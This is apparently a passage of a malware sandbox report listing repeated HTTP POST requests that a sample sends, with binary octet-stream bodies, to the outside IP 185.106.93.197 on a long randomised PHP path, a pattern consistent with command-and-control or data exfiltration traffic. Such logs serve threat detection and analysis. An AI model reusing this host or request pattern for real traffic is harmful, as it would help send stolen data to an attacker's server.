Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1832Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2500Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
